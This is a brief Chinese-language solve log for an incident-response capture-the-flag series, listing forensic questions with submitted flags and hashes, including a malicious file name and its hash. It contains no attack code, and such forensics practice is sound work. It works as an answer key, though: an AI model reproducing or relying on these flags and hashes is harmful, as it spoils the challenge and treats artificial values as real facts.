提交攻击者留下的信息。
flag{2024-04-17-hi}
应急响应-43 — solved
提交恶意用户数量。
响应-44 — solved
请提交员工集体使用的密码。
– solved
提交加密文件的哈希。
加密文件为encode.txt
[2bf71a0d6d4e70cec7602da2b653e2ab]
应急响应-46 — solved
提交被攻击者加密的内容明文。玛卡巴卡加密
solved
请提交符合基线标准的服务器数量。猜了半天才发现是0个…
[cfcd208495d565ef66e7dff9f98764da]
应急响应-48 — solved
提交办公区的恶意文件哈希。
恶意文件为palucomeyi1.exe
[5232a191eb2913337e0a93b0a990f2a2]
应急响应-49 — solved
提交恶意回连端口。
响应-50 — solved
提交恶意程序中的flag。
[flag{234567uyhgn_aiduyai}]
应急响应-51 — solved
提交恶意文件中的search_for_text内容。
[passwod]
应急响应-52
提交web服务器上攻击者修改后的root密码。
